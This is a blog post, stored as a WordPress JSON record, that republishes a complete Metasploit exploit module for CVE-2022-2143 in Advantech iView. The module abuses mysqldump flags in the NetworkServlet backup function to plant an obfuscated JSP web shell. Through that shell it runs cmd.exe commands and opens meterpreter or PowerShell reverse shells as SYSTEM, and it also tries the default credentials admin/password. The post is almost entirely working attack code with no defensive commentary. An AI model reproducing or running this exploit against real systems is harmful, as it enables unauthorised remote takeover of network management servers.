{"id":29422,"date":"2022-08-18T21:38:46","date_gmt":"2022-08-18T17:38:46","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168108\/advantech_iview_networkservlet_cmd_inject.rb.txt"},"modified":"2022-08-24T08:50:25","modified_gmt":"2022-08-24T04:20:25","slug":"advantech-iview-networkservlet-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/advantech-iview-networkservlet-command-injection\/","title":{"rendered":"Advantech iView NetworkServlet Command Injection"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n

include Msf::Exploit::CmdStager
\ninclude Msf::Exploit::Remote::HttpClient
\nprepend Msf::Exploit::Remote::AutoCheck
\ninclude Msf::Exploit::FileDropper<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Advantech iView NetworkServlet Command Injection’,
\n‘Description’ => %q{
\nVersions of Advantech iView software below `5.7.04.6469` are
\nvulnerable to an unauthenticated command injection vulnerability
\nvia the `NetworkServlet` endpoint.
\nThe database backup functionality passes a user-controlled parameter,
\n`backup_file` to the `mysqldump` command. The sanitization functionality only
\ntests for SQL injection attempts and directory traversal, so leveraging the
\n`-r` and `-w` `mysqldump` flags permits exploitation.
\nThe command injection vulnerability is used to write a payload on the target
\nand achieve remote code execution as NT AUTHORITY\\SYSTEM.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘rgod’, # Vulnerability discovery
\n‘y4er’, # PoC
\n‘Shelby Pace’ # Metasploit module
\n],
\n‘References’ => [
\n[ ‘URL’, ‘https:\/\/y4er.com\/post\/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce\/’],
\n[ ‘CVE’, ‘2022-2143’]\n],
\n‘Platform’ => [ ‘win’ ],
\n‘Privileged’ => true,
\n‘Arch’ => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
\n‘Targets’ => [
\n[
\n‘Windows Dropper’,
\n{
\n‘Arch’ => [ ARCH_X86, ARCH_X64 ],
\n‘Type’ => :win_dropper,
\n‘CmdStagerFlavor’ => [ ‘psh_invokewebrequest’, ‘vbs’ ],
\n‘DefaultOptions’ => { ‘PAYLOAD’ => ‘windows\/x64\/meterpreter\/reverse_tcp’ }
\n}
\n],
\n[
\n‘Windows Command’,
\n{
\n‘Arch’ => ARCH_CMD,
\n‘Type’ => :win_cmd,
\n‘DefaultOptions’ => { ‘PAYLOAD’ => ‘cmd\/windows\/powershell_reverse_tcp’ }
\n}
\n]\n],
\n‘DisclosureDate’ => ‘2022-06-28’,
\n‘DefaultTarget’ => 0,
\n‘Notes’ => {
\n‘Stability’ => [ CRASH_SAFE ],
\n‘Reliability’ => [ REPEATABLE_SESSION ],
\n‘SideEffects’ => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n}
\n)
\n)<\/p>\n

register_options(
\n[
\nOpt::RPORT(8080),
\nOptString.new(‘TARGETURI’, [ true, ‘The base path to Advantech iView’, ‘\/iView3’]),
\nOptString.new(‘USERNAME’, [ false, ‘The user name to authenticate with’, ‘admin’]),
\nOptString.new(‘PASSWORD’, [ false, ‘The password to authenticate with’, ‘password’])
\n]\n)
\nend<\/p>\n

def check
\nres = send_request_cgi!(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path)
\n)<\/p>\n

return CheckCode::Unknown(‘Failed to receive a response from the application’) unless res<\/p>\n

unless res.body.include?(‘iView’)
\nreturn CheckCode::Safe(‘No confirmation that target is Advantech iView’)
\nend<\/p>\n

res = send_db_backup_request(”)
\nreturn CheckCode::Detected(‘Failed to receive response from backup request’) unless res<\/p>\n

# The patch added auth as a requirement for
\n# accessing the NetworkServlet endpoint
\nif res.body =~ \/ERROR:\\s+User\\s+Not\\sLogin\/
\n@needs_auth = true
\nprint_status(‘Vulnerability is present, though authentication is required.’)
\nend<\/p>\n

CheckCode::Appears
\nend<\/p>\n

def send_db_backup_request(filename)
\nsend_request_cgi(
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(target_uri.path, ‘NetworkServlet’),
\n‘keep_cookies’ => true,
\n‘vars_post’ =>
\n{
\n‘page_action_type’ => ‘backupDatabase’,
\n‘backup_filename’ => filename
\n}
\n)
\nend<\/p>\n

def format_jsp
\nbin_nums = []\narg_nums = []\nflag_nums = []\n

bin_param.each_char { |c| bin_nums << c.ord }
\nbin_nums = bin_nums.join(‘,’)
\narg_param.each_char { |c| arg_nums << c.ord }
\narg_nums = arg_nums.join(‘,’)
\nflag_param.each_char { |c| flag_nums << c.ord }
\nflag_nums = flag_nums.join(‘,’)<\/p>\n

‘<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((‘ \\
\n‘new ProcessBuilder(request.getParameter(‘ \\
\n“new java.lang.String(new byte[]{#{bin_nums}})),” \\
\n“request.getParameter(new java.lang.String(new byte[]{#{flag_nums}})),” \\
\n“request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())” \\
\n‘.getInputStream()))%>’
\nend<\/p>\n

def flag_param
\n@flag_param ||= Rex::Text.rand_text_alpha(3..8)
\nend<\/p>\n

def arg_param
\n@arg_param ||= Rex::Text.rand_text_alpha(3..8)
\nend<\/p>\n

def bin_param
\n@bin_param ||= Rex::Text.rand_text_alpha(3..8)
\nend<\/p>\n

def jsp_filename
\n@jsp_filename ||= “#{Rex::Text.rand_text_alpha(5..12)}.jsp”
\nend<\/p>\n

def execute_command(cmd, _opts = {})
\nsend_request_cgi(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, jsp_filename),
\n‘keep_cookies’ => true,
\n‘vars_get’ =>
\n{
\nbin_param => ‘cmd.exe’,
\nflag_param => ‘\/c’,
\narg_param => cmd
\n}
\n)
\nend<\/p>\n

def iview_authenticate
\nres = send_request_cgi!(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path)
\n)<\/p>\n

fail_with(Failure::UnexpectedReply, ‘Login page not found’) unless res && res.body.include?(‘loginWindow’)
\nvprint_good(‘Successfully accessed the login page’)<\/p>\n

res = send_request_cgi(
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(target_uri.path, ‘CommandServlet’),
\n‘keep_cookies’ => true,
\n‘vars_post’ => {
\n‘page_action_service’ => ‘UserServlet’,
\n‘page_action_type’ => ‘login’,
\n‘user_name’ => datastore[‘USERNAME’],
\n‘user_password’ => datastore[‘PASSWORD’],
\n‘use_ldap’ => ‘false’,
\n‘data’ => ”
\n}
\n)<\/p>\n

unless res && res.body.include?(‘Success’)
\nfail_with(Failure::BadConfig, ‘Authentication failed. Credentials likely incorrect.’)
\nend
\nvprint_good(‘Authentication successful!’)
\nend<\/p>\n

def need_auth?
\nres = send_request_cgi(
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘NetworkServlet’)
\n)
\nreturn false unless res<\/p>\n

!!(res.body =~ \/ERROR:\\s+User\\s+Not\\sLogin\/)
\nend<\/p>\n

def exploit
\nif @needs_auth || need_auth?
\niview_authenticate
\nend<\/p>\n

jsp_code = format_jsp<\/p>\n

sql_filename = “#{Rex::Text.rand_text_alpha(5..12)}.sql”
\nfull_cmd = “#{sql_filename}\\” -r \\”.\/webapps\/iView3\/#{jsp_filename}\\” -w \\”#{jsp_code}\\””<\/p>\n

res = send_db_backup_request(full_cmd)
\nfail_with(Failure::UnexpectedReply, ‘Failed to write JSP file to target’) unless res<\/p>\n

path = “webapps\\\\iView3\\\\#{jsp_filename}”
\nregister_file_for_cleanup(path)
\nif target[‘Type’] == :win_dropper
\nexecute_cmdstager
\nelse
\nexecute_command(payload.encoded)
\nend
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Advantech iView NetworkServlet Command Injection’, ‘Description’ => %q{ Versions of Advantech iView software below `5.7.04.6469` are vulnerable to an …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29422","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29422","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29422"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29422\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29422"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29422"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29422"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}